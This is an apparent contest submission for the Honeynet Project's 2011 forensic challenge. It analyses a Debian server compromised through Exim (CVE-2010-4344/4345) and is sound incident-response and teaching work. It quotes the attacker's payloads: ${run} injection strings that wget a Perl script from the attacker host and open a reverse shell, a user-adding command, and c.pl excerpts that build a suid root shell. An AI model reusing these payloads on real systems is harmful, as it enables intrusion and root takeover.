T H E H O N E Y N E T P R O J E C T® | Forensic Challenge 2011
Challenge 7: Forensic Analysis of a Compromised Server (simple)
Submission Template
Submit your solution at http://www.honeynet.org/challenge2010/ by 17:00 EST, Thursday, March 30th 2011. Results will be released around the third week of April.
Name (required):Kevin Mau / Email (required):Country (optional): / Profession (optional):
_ Student
X Security Professional
_ Other
Question 1. What service and what account triggered the alert? / Possible Points: 1pt
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 1.
Service: Exim
Account: Debian-exim
Exim was exploited this caused /var/log/exim4/paniclog to be written to this would have been a strong indicator that something was wrong and needed to be reviewed.
The /var/log/exim4 directory and sub files are owned by the Debian-exim user. A review of the memory dump via volatility shows the exim process was being run by Uid 101 which also maps back to the Debian-exim user account.
Volatility memory dump
Arguments Pid Uid
/usr/sbin/exim4 -bd -q30m 1942 101
/etc/passswd
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
Question 2. What kind of system runs on targeted server? (OS, CPU, etc) / Possible Points: 1pt
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 2.
The following files were reviewed to gather information on the server.
/var/log/dmesg
/var/log/syslog
/etc/fstab
/boot/grub/menu.lst
The system contains the following configuration
Debian 2.6.26-25lenny running under virtualbox
single 1.4 ghz processor
e1000 nic
1 gig drive /dev/sda broken into sda1 for / and sda5 for swap
256 megs of memory
Question 3. What processes were running on targeted server? / Possible Points: 2pts
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 3.
Downloaded the latest linux version of volatility using the following command
svn checkouthttp://volatility.googlecode.com/svn/branches/linux-support volatility-linux
Ran the following command to review the process list from the memory dump.
python volatility.py –profile=debian2626 linux_task_list_psaux –f /download/Victoria-v8.memdump.img
Arguments Pid Uid
init [2] 1 0
[kthreadd] 2 0
[migration/0] 3 0
[ksoftirqd/0] 4 0
[watchdog/0] 5 0
[events/0] 6 0
[khelper] 7 0
[kblockd/0] 39 0
[kacpid] 41 0
[kacpi_notify] 42 0
[kseriod] 86 0
[pdflush] 123 0
[pdflush] 124 0
[kswapd0] 125 0
[aio/0] 126 0
[ksuspend_usbd] 581 0
[khubd] 582 0
[ata/0] 594 0
[ata_aux] 595 0
[scsi_eh_0] 634 0
[kjournald] 700 0
udevd --daemon 776 0
[kpsmoused] 1110 0
/sbin/portmap 1429 1
/sbin/rpc.statd 1441 102
dhclient3 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp3/dhclient.eth0.leases eth0 1624 0
/usr/sbin/rsyslogd -c3 1661 0
/usr/sbin/acpid 1672 0
/usr/sbin/sshd 1687 0
/usr/sbin/exim4 -bd -q30m 1942 101
/usr/sbin/cron 1973 0
/bin/login -- 1990 0
/sbin/getty 38400 tty2 1992 0
/sbin/getty 38400 tty3 1994 0
/sbin/getty 38400 tty4 1996 0
/sbin/getty 38400 tty5 1998 0
/sbin/getty 38400 tty6 2000 0
-bash 2042 0
sh 2065 0
memdump 2168 0
nc 192.168.56.1 8888 2169 0
Question 4. What are attackers IP and target IP addresses? / Possible Points: 2pts
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 4.
The following logs were reviewed to determine the attacks IP
/var/log/exim4/maillog
/var/log/exim4/rejectlog
/var/log/auth.log
/var/log/syslog
/var/lib/dhcp3/dhclient.eth0.leases
Victoria-v8.memdump.img
The maillog and reject log show mail being sent from the attackers at 192.168.56.1 and 192.168.56.101
The auth.log also shows repeated ssh login attempts from the attacker at 192.168.56.1
When utilizing volatility to analyze the memory dump we can see established connections from the target IP 192.168.56.102 to attackers IP 192.168.56.1 on port 4444 and 8888.
We are also able to use volatility to potentially determine the MAC addresses of the attackers
192.168.56.1 0a:00:27:00:00:00
192.168.56.101 08:00:27:28:5a:cc
When analyzing syslog we can determine the new IP address received via DHCP was 192.168.56.102
We can also see in the DHCP leases in file /var/lib/dhcp3/dhclient.eth0.leases 192.168.56.102 was handed out to this server.
Question 5. What service was attacked? / Possible Points: 1pt
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 5.
Exim was attacked, all of the log files in /var/log were reviewed and the Exim logs showed strange behavior
/var/log/exim4/mainlog
/var/log/exim4/rejectlog
/var/log/paniclog
In the mainlog several mail items contained commands you wouldn’t normally see in a mail log.
2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <>: failed to expand ACL string "pl 192.168.56.1 4444; sleep 1000000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}}
2011-02-06 15:14:41 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <>: failed to expand ACL string "00000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/82.txt -O /tmp/c.pl;perl /tmp/c.pl ; sleep 1000000'"}}
Question 6. What attacks were launched against targeted server? / Possible Points: 2pt
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 6.
Multiple Remove code execution exploits were launched against the server, some of these were successful others however failed. Once of the successful commands is listed below.
${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}}
A privilege elevation exploit was also launched on the server to elevate to root, the most relevant section is listed below.
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
Question 7. What flaws or vulnerabilities did he exploit? / Possible Points: 2pts
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 7.
Based on the information contained in the log files and a little google fu the following was found.
A remote code execution vulnerability was utilized to attack this server.
http://www.debian.org/security/2010/dsa-2131
http://security-tracker.debian.org/tracker/CVE-2010-4344
A further privilege elevation exploit was utilized to gain root permissions
http://security-tracker.debian.org/tracker/CVE-2010-4345
Question 8. Were the attacks successful? Did some fail? / Possible Points: 2pts
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 8.
Yes some of the attacks were successful, the files downloaded to the system during the attack still exist
/tmp/c.pl
/tmp/rk.tar
The below attacks would have failed due to invalid parameters passed to c.pl
run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/82.txt -O /tmp/c.pl;perl /tmp/c.pl ; sleep 1000000'"}}
The below attacks would have failed because these commands weren’t running with root credentials.
2011-02-06 15:15:04 SMTP call from [192.168.56.1] dropped: too many unrecognized commands (last was "cat "ulysses:x:00:00:Ulysses:/home/ulysses:/bin/sh" > /etc/passwd")
HeaderX: ${run{/bin/sh -c "exec /bin/sh -c 'useradd --gid root --create-home --password 0 0mkpasswd -H md5 Ulyss3s) ulysses'"}}
Question 9. What did the attacker obtain with attacks? / Possible Points: 2pts
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 9.
The attacker was able to download and remotely execute code on the server. The attacker was able to utilize this code to elevate privileges and establish a reverse shell and gain root permissions.
/tmp/c.pl
The following rootkit was also downloaded but it doesn’t look like it was installed.
/tmp/rk.tar
Question 10. Did the attacker download files? Which ones? Give a quick analysis of those files. / Possible Points: 3pts
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 10.
The attacker downloaded c.pl and rk.tar
c.pl did a few things
It opened a reverse shell to the attacker on a port they specific in the parameters of the attack.
$ARGC=@ARGV;
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
It wrote out s.c to /var/spool/exim4
open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
};
close FILE;
The script goes onto compile s.c
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c");
The script goes on to write out e.conf and then launch Exim with this config file. This takes advantage of the spool command to set the shell s as suid to allow the attacker access to a root shell. The attacker now has root as long as the reverse shell connects.
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);
rk.tar is the shv5 rootkit this add’s several trojanized utilities to the system such as netstat, mv, ls, cp, kill, etc and sets them immutable so they cannot be easily removed. Based on the install scripts, and md5 hashes of the files it does not look like this rootkit was installed on the compromised system.
Question 11. What can you say about the attacker? (Motivation, skills, etc) / Possible Points: 2pts
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 11.
The attacker seemed to be motivated to persist on the target, while they didn’t install the rootkit to further compromise the host the presence of the rootkit suggests persistence was desired. This could have been to turn the server into a bot, warez dump or any other potential misuse of services.
Skill wise the attacker was a complete amateur, files were left on the file system such as c.pl, rk.tar, and s. The panic log wasn’t cleared, the rootkit was also never installed to help cover their tracks. The attack failed several times seemingly while the attacker was trying to figure out how to use the publically available exploit code.
Question 12. Do you think these attacks were automated? Why? / Possible Points: 1pt
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 12.
No I don’t think these attacks were automated there were far to many failures and to much time in between attacks. Typically with the automated attacks I’ve seen in the past failures are less common unless everything fails. Also the attacks were at seemingly random time intervals, most automated attacks will continue to attack at set time intervals.
Question 13. What could have prevented the attacks? / Possible Points: 2pts
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer 13.
This remote code execution vulnerability targeted Exim 4.69 and earlier, if the exim package on the server was kept current this wouldn’t have occurred.
4.69 was released in January of 2008
4.70 was released in November of 2009
The privilege elevation vulnerability targeted Exim 4.72 and earlier, if the Exim package on the server was kept current this would have prevented further potential compromise via this avenue.
4.69 was released in January of 2008
4.73 was released in January of 2011
The network / server administrator could prevented outbound non-established connections from the server to internet resources. This would have prevented the reverse shell connection and potential further compromise. The Exim service could also have been jailed this would have locked the user into an isolated environment and prevented things like a rootkit from compromising the host itself.
Bonus. From memory image, can you say what network connections were opened and in which state ?
Tools Used: Sift toolkit, volatility, native linux commands; mount, cat, grep, etc
Awarded Points:
Answer Bonus.
Using the Volatility toolkit we can utilize the following command to extract the network connections that were open at the time of the memory dump.
python volatility.py –profile=debian2626 linux_netstat –f /download/Victoria-v8.memdump.img
UDP 0.0.0.0:111 0.0.0.0:0 portmap/1429
TCP 0.0.0.0:111 0.0.0.0:0 LISTEN portmap/1429
UDP 0.0.0.0:769 0.0.0.0:0 rpc.statd/1441
UDP 0.0.0.0:38921 0.0.0.0:0 rpc.statd/1441
TCP 0.0.0.0:39296 0.0.0.0:0 LISTEN rpc.statd/1441
UDP 0.0.0.0:68 0.0.0.0:0 dhclient3/1624
UNIX /dev/log
UNIX /var/run/acpid.socket
TCP 0000:0000:0000:0000:0000:0000:0000:0000:22 0000:0000:0000:0000:0000:0000:0000:0000:0 LISTEN sshd/1687
TCP 0.0.0.0:22 0.0.0.0:0 LISTEN sshd/1687
TCP 0000:0000:0000:0000:0000:0000:0000:0000:25 0000:0000:0000:0000:0000:0000:0000:0000:0 LISTEN exim4/1942
TCP 0.0.0.0:25 0.0.0.0:0 LISTEN exim4/1942
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:43327 192.168.56.1:4444 ESTABLISHED sh/2065
TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
TCP 192.168.56.102:25 192.168.56.101:37202 CLOSE sh/2065
TCP 192.168.56.102:56955 192.168.56.1:8888 ESTABLISHED nc/2169
The work is licensed under a Creative Commons License.
Copyright © The Honeynet Project, 2010
Page 3 of 8